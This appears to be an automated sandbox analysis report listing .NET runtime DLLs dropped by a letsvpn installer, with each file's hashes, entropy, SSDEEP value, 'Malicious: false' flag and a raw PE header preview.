C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.InteropServices.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	19432
Entropy (8bit):	6.7377047539245725
Encrypted:	false
SSDEEP:	384:I09bOAghbsDCyVnVc3p/i2fBVlAO/BRU+psbC984vmJHrE1dtx66aI2sU52RWVsU:BOAghbsDCyVnVc3p/i2fBVlAO/BRU+py
MD5:	13D650992AF14213B9565D416057012A
SHA1:	CE3D1DEB715263125749A43E9A347518550297FF
SHA-256:	CBF3D7B658B37C258380A5BEAB2669314B68462B5B2F45F36E9F065BF521A69A
SHA-512:	4673F59C59BBB8B71B3EEAD3CCDE700AC20AAA5B17AB007355A8536CAB000A5555D2E3736CF5CABDDDB2FE34688096DA2F5F7E0A3469E553A79BB95AE85FCC84
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............r5... ...@....... ...............................K....@................................. 5..O....@..P............ ...+...`.......3............................................... ............... ..H............text...x.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B................T5......H.......P ......................h3......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................r.....................e...........4.................3.....L...................................R...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Numerics.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.88873036151209
Encrypted:	false
SSDEEP:	384:o7W6RWXGpwKANynsAw/98E9VF3AM+oLl1J:o5YAw/KENAMxnJ
MD5:	9308174B4258B8ACE653B81D24EA4BF2
SHA1:	21D5227DD3B9AC27C19C46CF2E7EF6039034CDCC
SHA-256:	0BD6B33FA49515EC6B2F416BCAD46DD8C59270EDB587FDD2F4140AB7F4D17D88
SHA-512:	8ED40209B4F45F8B307C13CBFD82786109E8BFF62190CD1C20ACB23B1FA00FC9818F8EDDC906C7D4F218AFBFB29792DBF71179BF878B7F8254B6165CC302817A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ....................................@.................................T(..O....@...................+...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l.......#~......4...#Strings....(.......#US.,.......#GUID...<.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Serialization.Formatters.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.972036771580835
Encrypted:	false
SSDEEP:	384:yI5HeWFwTBsWnypwKANynsAw/98E9VF3AM+owYqbnV/:yI5HFwTBZAw/KENAMxPqx
MD5:	ED3DBEBBDACB64C5D09444DF8D4A7DF7
SHA1:	B57B7BBF172721EAAB1EF5544E68415B3E0E393E
SHA-256:	BE631EFF0AEE6E39110438EEFEB35F35D4F38032DAA0EC430D106C25566833A7
SHA-512:	AA9D6209B3DAA4C0052ABFDE62B42F7525853F2917287229728F386BA2D69D70D01E794AED82B95E5CD27FD007DA9D74344776403E9C869C4F2B79B323D8EFDA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@.................................\|)..O....@...................+...`......D(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ..t....................'......................................BSJB............v4.0.30319......l.......#~..H.......#Strings....@.......#US.D.......#GUID...T... ...#Blob......................3............................................................U.x...........................~.....4.....M.................h.....$...................r.....r.....r...).r...1.r...9.r...A.r...I.r...Q.r...Y.r...a.r...i.r...q.r.......................#.....+.....3.....;.)...C.D...K.d...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Serialization.Json.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.940117915440905
Encrypted:	false
SSDEEP:	384:fAJpVWbfkBnW4CpwKANynsAw/98E9VF3AM+oyMsBS:fAJpWfkBlAw/KENAMxbd
MD5:	E5D4C28265C4C251175A19ED9813BDF3
SHA1:	209973EC30608A69178C1DF5EB9F99FFBA8F1246
SHA-256:	360C12A381B1E12D4F46E127BE706B6A503233933B1C485B9BFE2684F19678A3
SHA-512:	591FAC416565BC724F7BE43AAD3FBE5B2AA338E7A28AA47675FEFD14267467FA95E0C7B690B2064836DA4CBF32A0A3D1824491BA16110C5091541D8F3BFF1B82
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............>)... ...@....... ....................................@..................................(..O....@..`................+...`.......'............................................... ............... ..H............text...D.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................ )......H.......P ......................4'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...........@...\.@...0.-...`.....D.................C.................[.....x.....-.........................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'.......................#.....+.....3.....;.#...C.>...K.^...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Serialization.Primitives.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	21992
Entropy (8bit):	6.600904799477403
Encrypted:	false
SSDEEP:	384:d8R71h7yzt94dHWFgQBVWeHWFyTBVWHApwKANynsAw/98E9VF3AM+o5NgJbSTTt:81dyAqgQBfqyTBeAw/KENAMx5mYvt
MD5:	0AAFD15B62DAF8E1CC9A828D6E005D20
SHA1:	83E8AB9DA757632AEA51D8FCCB1F6037C75CDA5D
SHA-256:	ABF28DDF5BA35DA1FE953DE121B919D7A2F9DDE53D3ECECDFFFFF2021F2B3A88
SHA-512:	76E0A83A59C8DB51891482906FC5FEA74ED0C727AEA102FBC2866D78D426B3F29CA3DA21A286AB59B784B155D1199F5FAA4A98718515D15CCC83D9FE28E5860D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............8... ...@....... ....................................@..................................8..O....@..8...............+...`.......7............................................... ............... ..H............text........ ...................... ..`.rsrc...8....@......................@..@.reloc.......`.......(..............@..B.................8......H.......\|!..l............1..p...X7......................................j~....%-.&(....s....%..........0..$.........(.....o.......&...,....o....,.....................,!(....,..r...p.(....(......(......(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(....2r...p.(..........(......BSJB............v4.0.30319......l.......#~..h.......#Strings....\...4...#US.........#GUID...........#Blob...

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Serialization.Xml.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	19944
Entropy (8bit):	6.74011046147318
Encrypted:	false
SSDEEP:	384:ypsBljcZQIVI8CNwbcyMWs4oBOW9MWG4tBOW2KpwKANynsAw/98E9VF3AM+owimK:4sPMQMI8COYyi4oBNw4tBqAw/KENAMxx
MD5:	CBDC17202266F634C5069B562B6CB5A0
SHA1:	F32B73EF640CA7F068ECB3A147738CFE9F970C0D
SHA-256:	E0DB073C07CFAB4A29006A5C1874994B38E87E4C93233B3691BAD8839B379079
SHA-512:	E64CBA608FA5B3FA88ECD42ACB3C817003FAF2DDBD97E6D3A974655C240F8AFB0ADAF37EC597E4F1C0006F4F0F74DD8B1DE268207777303064E64E4CD4D85F6D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............3... ...@....... ...............................l....@..................................3..O....@..............."...+...`.......2............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................3......H........!..0...................L2.......................................s......s......0...........o....u......,..o......0..%........s..........(....r...p.$o......o....:.(......}......{.....(....z.(....z6.{.....o....:.{......o.....(....z:.{......o.....(....z.(....z.BSJB............v4.0.30319......l.......#~.. .......#Strings....$...0...#US.T.......#GUID...d.......#Blob...........W..........3............................................................................

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24552
Entropy (8bit):	6.391407248385007
Encrypted:	false
SSDEEP:	384:2bhigwLAuZtM66g/Id7WVXWl9pwKANynsAw/98E9VF3AM+oVu46/VmeY:2bhzkKsDAw/KENAMx7UY
MD5:	F5316D5E6D212490397ED265B4AA0F37
SHA1:	CD3A01E05984CE99FEB33338AAB2FC1F76DD44CD
SHA-256:	260209A9CAC746A4DA6DF7FF5950E6782919D025970C23B4A69D194859F28EB8
SHA-512:	67F1B218AE0BC9B40C500B16C9D1CEC5CD14242E2EDC9F88A4DDE2658D40A5F59B98943869813103B0733070E9DD92ECB484399F2C1BD34F93A31AAE949BB8EB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0............"H... ...`....... ..............................`h....@..................................G..O....`...............4...+...........F............................................... ............... ..H............text...((... ..................... ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................H......H.......P ...%...................F......................................BSJB............v4.0.30319......l.......#~..........#Strings.....#......#US..#......#GUID....#......#Blob......................3................................................_.........................8.....8....8.....8.....8.....8.....8.....8..........8.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.+...K.K...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.AccessControl.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	37864
Entropy (8bit):	6.113294034752602
Encrypted:	false
SSDEEP:	384:zPlIF91FhktexyvaMAdB+w3G5h9MF4YfzMfpcrqmf9wEJqIxVRvFNgfBkyN17xWM:blM7Ke5/WBkyN1h2Aw/KENAMxeQF/GH
MD5:	B908CD7ACACF57942271E00070A1FA7D
SHA1:	6E870A4E00BF32E226028CA6E2A8DFA94F2FB46E
SHA-256:	B830A073904321782C11AB5E3DB261D9E3BA2BE5F880C1D8CCF2A79248AF9729
SHA-512:	5CC65866475BB48524265BDDC4EBAEDF7DB9265A214762D7F554882B54BD2560009BA67D49E2F9ACC13FB8FB1ECEE29497F11EA5F8F79B87B8CA3F20616E58C8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..Z...........x... ........... ...............................x....`..................................x..O....................h...+...........w..T............................................ ............... ..H............text....X... ...Z.................. ..`.rsrc................\..............@..@.reloc...............f..............@..B.................x......H........%..p5..........P[.......w.......................................~......0..........(....,....(.....o.......&......................0...........(.......(....-..,....(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%...%...%...(........(.....(....,"r...p......%...%...%...%..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Claims.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.91934807837682
Encrypted:	false
SSDEEP:	384:VUcX6W9aWetpwKANynsAw/98E9VF3AM+okHcXJPUP:VUchZAw/KENAMxHXqP
MD5:	AAB19A69B3EDF4A652C591EF9FD7DB28
SHA1:	D7A0FC149457C5D763E5509C4FA284719230BABB
SHA-256:	BFD61CFA99C7AAE0861004F4D0F57FC412A29F6407C9841DA2AC63040C8F25FD
SHA-512:	B7921502E28EFD55085835BF63B5EA9AD59DE7366B41B251682D023A020421B0F8E0D1342E4A46F2B7B208D3EBE16B3001376B8EA1F88301B8BEF686B54E745A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............B)... ...@....... ..............................K.....@..................................(..O....@...................+...`.......'............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$)......H.......P ......................8'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....(.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Algorithms.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41960
Entropy (8bit):	6.008639993845578
Encrypted:	false
SSDEEP:	768:SoBj7kS+8mjvHTeaWKs0Sd4eedAw/KENAMxj:BPmb9WKs0PeedAwrxj
MD5:	A45146CB7A8CE3C028ED19213E3B567E
SHA1:	65C17BC3941EE34E8062911AABBEC98379262CE0
SHA-256:	F738F16DFACBF64EF667BDEFEA5EA4D80119DD673690BFB73D10E170364E709B
SHA-512:	1F967B8F8A98A951AE6C9F4E3BE5793735B454A0EEAD09455A62FD9B689516810B920F1B74E166877C9035CDC43A33AEE4E37B0CD95B77EF67C9E853655A5A3B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..h.............. ........... ....................................@.................................u...O.......8............x...+........................................................... ............... ..H............text....f... ...h.................. ..`.rsrc...8............j..............@..@.reloc...............v..............@..B........................H.......P'..\8..........._...%..,.......................................j~....%-.&(F...s....%..........0..$.........(.....o.......&...,....o....,.....................,!(....,..r...p.(....(......(......(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(....2r...p.(....2rI..p.(....2r...p.(....2r...p.(....2r...p.(....2r...p.(....2r9..p.(....2rm..p.(....2r...p.(....2r...p.(....*2r=..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Cng.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	20968
Entropy (8bit):	6.740409637923953
Encrypted:	false
SSDEEP:	384:KedtuO/q3p4YN5XYwWCfWCgPpwKANynsAw/98E9VF3AM+o1O6T:KeJSZBXY4I+Aw/KENAMxM8
MD5:	841522B4F5BE2B3B6BA1DAB6AEC8D8F8
SHA1:	FBEE9376666DCC5B8D36ACE81EF843B672C77B81
SHA-256:	2F3A70A68A089A8407E8FBD117E60832833B4D21AD48FEE9CE35A5990ECE1C27
SHA-512:	274131ED9D22F452B69F3FF09E42C1CFCCF2928C9527CE2E45D2E75093A2B8B869A0FCC833B645BF8FA3ED6AB4575D7BF904FAFFFAEA8686F427ADECF29E8006
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q............." ..0.............j:... ...@....... ....................................`..................................:..O....@...............&...+...`.......9..T............................................ ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B................L:......H.......\|!..............t6.. ....8......................................:.(......}......{...."..(...."..(...."..(......(......(......(......(....:.(......}......{....:.(......}......{....:.(......}......{......(....:.(......}......{....^.(...........%...}....:.(......}......{....z.(......}...........%...}....V.(......}......}......{......{....*..BSJB............v4.0.30319......l.......#~..@.......#Strings....T.......#US.X.......#GUID...h.......#Blob...

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Csp.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.948155823281706
Encrypted:	false
SSDEEP:	384:WoTI2pWPzWXbpwKANynsAw/98E9VF3AM+oColk:vE3fAw/KENAMxrk
MD5:	07AF657FA36485F8DCF3024E9D9DF120
SHA1:	CBE6E6E4833E52311E4F3A12F76D7B861E2C3783
SHA-256:	83329E17DBE093394B45BE306E375CECFDF13B4444B741DA5C8A223055DF9463
SHA-512:	A715240658E6D0DAA4B388BCC66FB426020F32EBE4291743F35114C5EC684085FE9681D66969562E07F738FB0B5BD11D3F8BDBBD45370DF7D812B3E0785E201A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............^)... ...@....... ....................................@..................................)..O....@..`................+...`.......'............................................... ............... ..H............text...d.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................@)......H.......P ......................T'......................................BSJB............v4.0.30319......l.......#~..,.......#Strings............#US.........#GUID...........#Blob......................3......................................z...........A...\.A...0.....a.....D.................C.................[.....x.....-.........................(.....(.....(...).(...1.(...9.(...A.(...I.(...Q.(...Y.(...a.(...i.(...q.(.......................#.....+.....3.....;."...C.=...K.]...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Encoding.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.959924662620125
Encrypted:	false
SSDEEP:	384:ocezoy4W04W3+jpwKANynsAw/98E9VF3AM+oJz43M2z:oBzoy+nAw/KENAMxaf
MD5:	6E479108D89131E47325C613835E7A67
SHA1:	A87ADC0B2889795EBE2EEFC720E2A9D9E358200B
SHA-256:	BD3F4EC450E4A1789DFE5AF83421FCCC9EFEE12DC9D2755D9BB23B0AB0DAE270
SHA-512:	87DFA337AF68DE3364022AC3126CE17EE9CB2DC924792ABB893409F6CC0684248DE3E53A07447E8881C7B83AFD3E5C255BBFBB795EA59281899E34230C0E7B82
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............~)... ...@....... ...............................J....@.................................,)..O....@...................+...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`)......H.......P ..$...................t'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID....... ...#Blob......................3..................................................f...o.f...C.S.........W.................V...........%.....n...........@.....)...................M.....M.....M...).M...1.M...9.M...A.M...I.M...Q.M...Y.M...a.M...i.M...q.M.......................#.....+.....3.....;.'...C.B...K.b...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Pkcs.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	21992
Entropy (8bit):	6.706723910215356
Encrypted:	false
SSDEEP:	384:vyBGXZp94Yi06W82WblpwKANynsAw/98E9VF3AM+owI0d3Nj95:mmZp9ZwQAw/KENAMxGdt
MD5:	C39270CAA45F880EE80CE8CFDDFB8BE4
SHA1:	9FA647B7DD989BC9CCBC90A4F30E4D191C8E178B
SHA-256:	68D44D298A5D557BCEECFCD3E7BE7915731EA4EA98E773AE81EA22A38E12C0A0
SHA-512:	9E2CC9CF2B10B2984E81777FFDA03B60DBE38FEDD8FA26250C6C6424AA2B4F57D0AD5FA189F73DB4085BB64ABE5660B3384F5A64C84F9745DE425C9DD9312145
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....J..........." ..0.............Z=... ...@....... ..............................A....`..................................=..O....@..X...............+...`.......<..T............................................ ............... ..H............text...`.... ...................... ..`.rsrc...X....@....... ..............@..@.reloc.......`.......(..............@..B................;=......H........!..............d9.. ....;......................................:.(......}......{...."..(...."..(...."..(...."..(...."..(......(......(......(......(....:.(......}......{....:.(......}......{....:.(......}......{......(....:.(......}......{....^.(...........%...}....:.(......}......{....z.(......}...........%...}....V.(......}......}......{......{....*BSJB............v4.0.30319......l...h...#~......0...#Strings............#US.........#GUID...

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Primitives.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.855205421046032
Encrypted:	false
SSDEEP:	384:uH/JWKpWu7pwKANynsAw/98E9VF3AM+oW4A4:uH/jMAw/KENAMxV
MD5:	F855E3307E1AAD4F5AF27A054C61E492
SHA1:	B71EA5F344AA79D7AE334233F302CCD1B8B4B980
SHA-256:	DA07E4B8309FA157EBC51F2BBFB36BF39DFB8015ED008D1273DC245BECBD333E
SHA-512:	5280886ECE8EFB644F7592A100199CE99393017D028923CD018EB8CC13B0BD0ACDD1223CB25756DCCD6445ED0960E388FA5912099BBE62CF2C65B30BD837B75A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0............."... ...@....... ..............................p.....@..................................)..O....@...................+...`.......(............................................... ............... ..H............text...(.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.......................H.......P .......................(......................................BSJB............v4.0.30319......l...$...#~..........#Strings............#US.........#GUID....... ...#Blob......................3............................................................o.s...........D.....D.....D.....D...8.D...Q.D.....D.....D...l.....U.D.................m.....m.....m...).m...1.m...9.m...A.m...I.m...Q.m...Y.m...a.m...i.m...q.m.......................#.....+.....3.....;.)...C.D...K.d...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.ProtectedData.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	20968
Entropy (8bit):	6.777414006114725
Encrypted:	false
SSDEEP:	384:d4YlS5PWAb6jDW3ipwKANynsAw/98E9VF3AM+oHBMpo:dmY+Aw/KENAMxhj
MD5:	8041547FA4F9BE1318BB80AB29901355
SHA1:	A7A349D71A8994E5CF6D764AA99C67E8BF3B8EBF
SHA-256:	4844B9F4A31796B233C9082916234091574000C51C55A59A23E682DB21F83878
SHA-512:	0C94775BC11990D3EAD334A1C44A76C7E242CA46B79A5B4CD61520CCBC993A932AE57EB66E3F10FEE496649C78D19659A8306FB8004740851E8FF77A6ACB037D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H.W..........." ..0..............9... ...@....... ..............................>.....`.................................M9..O....@...............&...+...`......88..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................9......H........!...............5..0....7......................................:.(......}......{...."..(...."..(...."..(...."..(...."..(......(......(......(......(....:.(......}......{....:.(......}......{....:.(......}......{......(....:.(......}......{....^.(...........%...}....:.(......}......{....z.(......}...........%...}....V.(......}......}......{......{....*BSJB............v4.0.30319......l.......#~..0.......#Strings............#US.........#GUID...

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.X509Certificates.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17896
Entropy (8bit):	6.803496403021755
Encrypted:	false
SSDEEP:	384:mTjbocNsWMhWz/pwKANynsAw/98E9VF3AM+oCyX22lFWalsz:mboYypAw/KENAMx1RWr
MD5:	458F2792F855051C6E3D8BC2B0D3F79F
SHA1:	BC3EFC2926ABF19FB80D93AC7610E1A5E881B75C
SHA-256:	B683D0F746885A8977A50C1B43338C9DE83D13346E5ABBF1857BC57F7C08C10D
SHA-512:	0E9F7C8AAEA94F63B43DDFD4344A3F360EA156BE4EFF4FACCF31A28E9C47B87C9A64223F2043B7F12AAF81C3B3504C1D57E44577D722F70941E6F9C6449CB057
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.................. ...@....... ..............................k]....@..................................-..O....@...................+...`.......,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................,......................................BSJB............v4.0.30319......l.......#~......\|...#Strings....x.......#US.\|.......#GUID.......(...#Blob......................3................................'.....).........u.................=......."...:."...W.".....".....".....".....".....".....[.....".................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;./...C.J...K.j...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Xml.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	51688
Entropy (8bit):	5.827593513547543
Encrypted:	false
SSDEEP:	768:7szrvuWznnuJlMeEM8Hy8d4Vx50lAhDVC+6Aw/KENAMxFLJ:7grvuqcP8RE5tQ+6AwrxX
MD5:	AA951918AFCB1227B16C12759EE52361
SHA1:	F026C0033AE8B708DD75616533F9D0947E5AFCF9
SHA-256:	9B474D8C10496969E0DA6306DE0CFDDD88BC042855BAE5FE229900BCAA923453
SHA-512:	2A9B4C881A67209C04E11A9FA7733E1C00306462F88D1197D0BD42BDB9C47899127D8215539C46AFEA2A544F98721D1FEC453FB0C2CFEFA5B0CD21C963DF4E6B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0................. ........... ..............................D.....`.....................................O.......4................+..............T............................................ ............... ..H............text....... ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B.......................H........&...K...........q.. ............................................~......0..........(....,....(.....o.......&......................0...........(.......(....-..,....(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%...%...%...(........(.....(....,"r...p......%...%...%...%..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Permissions.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	29672
Entropy (8bit):	6.385149831312396
Encrypted:	false
SSDEEP:	768:x47XzsCggQsW7Sl8xjP/QZsAw/KENAMxG:m7XgpRxb/ksAwrxG
MD5:	952FB69041A3ADC1AE00D975693303DB
SHA1:	D4952E7CB2406A43E2830241138322DE0A46373B
SHA-256:	620012CA3AEBF21D548A17EEA00EE9C79BC2EB3E9432D1E563CB9BD51B4CF47F
SHA-512:	39843357ECFB48505A2B68D374A1060523B787FFF8DCA3009CC1B6D6AE3426B84B3BD7064B55F06E015063D7D538D62E2657AE5DB700B13F9DECDCD85CAFC2C9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0............." ..0..>..........r]... ...`....... ....................................`..................................]..O....`...............H...+..........(\..T............................................ ............... ..H............text...x=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............F..............@..B................S]......H........#...2..........0U..x....[.......................................~......0..........(....,....(.....o.......&......................0...........(.......(....-..,....(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%...%...%...(........(.....(....,"r...p......%...%...%...%..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Principal.Windows.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	20456
Entropy (8bit):	6.765031058960111
Encrypted:	false
SSDEEP:	384:uEwo6eTs14YY4cWpOWsgpwKANynsAw/98E9VF3AM+oKmAgqx3:LwDdTaAw/KENAMxHq
MD5:	5F0B08C73356BEC164D3E8C9BE85AD13
SHA1:	C627AD3F37A4AB7FD05336413FD97F541CDD0132
SHA-256:	464DAA5272DE2A51C97B3C490B20C620B062301723961A3E5EE31AD1E8D9041F
SHA-512:	066219C54B4D73552D5CA467F37EC35B2B20E6418A17593028EEFD015119673384BCA515F17104828654C61450966ED0A0A5CEFD20AF45E63886BB9468A22062
Malicious:	false
